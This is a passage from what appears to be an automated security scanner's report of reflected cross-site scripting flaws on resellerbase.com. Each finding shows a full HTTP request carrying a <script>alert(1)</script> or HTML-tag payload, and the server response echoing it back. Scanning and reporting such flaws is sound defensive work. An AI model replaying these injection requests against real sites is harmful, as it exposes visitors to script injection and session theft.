<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/c99e1<script>alert(1)</script>2e28f4d42b5 was not found on this server.</p>
...[SNIP]...

2.1744. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86be6<script>alert(1)</script>6120d5352a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail86be6<script>alert(1)</script>6120d5352a4/22/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail86be6<script>alert(1)</script>6120d5352a4/22/rating.php was not found on this server.</p>
...[SNIP]...

2.1745. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a8cae<script>alert(1)</script>788b712f9291a0962 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /detaila8cae<script>alert(1)</script>788b712f9291a0962/22/rating.php?id=22&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila8cae<script>alert(1)</script>788b712f9291a0962/22/rating.php?id=22&rating=5 was not found on this server.</p>
...[SNIP]...

2.1746. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec1bc<script>alert(1)</script>5c602d45b00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22ec1bc<script>alert(1)</script>5c602d45b00/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22ec1bc<script>alert(1)</script>5c602d45b00/rating.php was not found on this server.</p>
...[SNIP]...

2.1747. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5441a<script>alert(1)</script>fb65b5e3fbae1d7db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /detail/225441a<script>alert(1)</script>fb65b5e3fbae1d7db/rating.php?id=22&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/225441a<script>alert(1)</script>fb65b5e3fbae1d7db/rating.php?id=22&rating=5 was not found on this server.</p>
...[SNIP]...

2.1748. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bc976<script>alert(1)</script>03252a877bcc68883 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /detail/22/rating.phpbc976<script>alert(1)</script>03252a877bcc68883?id=22&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/rating.phpbc976<script>alert(1)</script>03252a877bcc68883?id=22&rating=5 was not found on this server.</p>
...[SNIP]...

2.1749. http://www.resellerbase.com/detail/22/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1322d<script>alert(1)</script>c600f5ea121 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/rating.php1322d<script>alert(1)</script>c600f5ea121 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/rating.php1322d<script>alert(1)</script>c600f5ea121 was not found on this server.</p>
...[SNIP]...

2.1750. http://www.resellerbase.com/detail/22/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8b60a<script>alert(1)</script>45ad11a6d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/rating.php?8b60a<script>alert(1)</script>45ad11a6d30=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/rating.php?8b60a<script>alert(1)</script>45ad11a6d30=1 was not found on this server.</p>
...[SNIP]...

2.1751. http://www.resellerbase.com/detail/22/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7cb5<script>alert(1)</script>044e52dbe258c79e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /detail/22/rating.php/e7cb5<script>alert(1)</script>044e52dbe258c79e8?id=22&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/rating.php/e7cb5<script>alert(1)</script>044e52dbe258c79e8?id=22&rating=5 was not found on this server.</p>
...[SNIP]...

2.1752. http://www.resellerbase.com/detail/22/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac2ad<script>alert(1)</script>6f0498f8347 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailac2ad<script>alert(1)</script>6f0498f8347/22/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailac2ad<script>alert(1)</script>6f0498f8347/22/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1753. http://www.resellerbase.com/detail/22/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b44c2<script>alert(1)</script>8fb3aedc917 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22b44c2<script>alert(1)</script>8fb3aedc917/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22b44c2<script>alert(1)</script>8fb3aedc917/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1754. http://www.resellerbase.com/detail/22/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 28c72<script>alert(1)</script>17d5d67f779 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/search.php28c72<script>alert(1)</script>17d5d67f779?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php28c72<script>alert(1)</script>17d5d67f779?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1755. http://www.resellerbase.com/detail/22/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d3f6b<a>1e23333acb8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/search.php?keyword=search...&Submit3=Searchd3f6b<a>1e23333acb8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php?keyword=search...&Submit3=Searchd3f6b<a>1e23333acb8&opt=2 was not found on this server.</p>
...[SNIP]...

2.1756. http://www.resellerbase.com/detail/22/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1bd63<a>50f33bcf534 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/search.php?keyword=search...1bd63<a>50f33bcf534&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php?keyword=search...1bd63<a>50f33bcf534&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1757. http://www.resellerbase.com/detail/22/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b62b0<script>alert(1)</script>6734ec93b84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/search.php?keyword=search...&Submit3=Search&opt=2&b62b0<script>alert(1)</script>6734ec93b84=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php?keyword=search...&Submit3=Search&opt=2&b62b0<script>alert(1)</script>6734ec93b84=1 was not found on this server.</p>
...[SNIP]...

2.1758. http://www.resellerbase.com/detail/22/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/22/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 65ff8<a>25c62172825 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/search.php?keyword=search...&Submit3=Search&opt=265ff8<a>25c62172825 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php?keyword=search...&Submit3=Search&opt=265ff8<a>25c62172825 was not found on this server.</p>
...[SNIP]...

2.1759. http://www.resellerbase.com/detail/22/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50c45<script>alert(1)</script>65d9046e113 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50c45<script>alert(1)</script>65d9046e113/22/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50c45<script>alert(1)</script>65d9046e113/22/themes/ was not found on this server.</p>
...[SNIP]...

2.1760. http://www.resellerbase.com/detail/22/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c3234<script>alert(1)</script>43d4ffec630 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22c3234<script>alert(1)</script>43d4ffec630/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22c3234<script>alert(1)</script>43d4ffec630/themes/ was not found on this server.</p>
...[SNIP]...

2.1761. http://www.resellerbase.com/detail/22/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f70f6<script>alert(1)</script>2ea0235048e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themesf70f6<script>alert(1)</script>2ea0235048e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themesf70f6<script>alert(1)</script>2ea0235048e/ was not found on this server.</p>
...[SNIP]...

2.1762. http://www.resellerbase.com/detail/22/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/22/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4105a<script>alert(1)</script>59aeb9ae75c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/?4105a<script>alert(1)</script>59aeb9ae75c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/?4105a<script>alert(1)</script>59aeb9ae75c=1 was not found on this server.</p>
...[SNIP]...

2.1763. http://www.resellerbase.com/detail/22/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
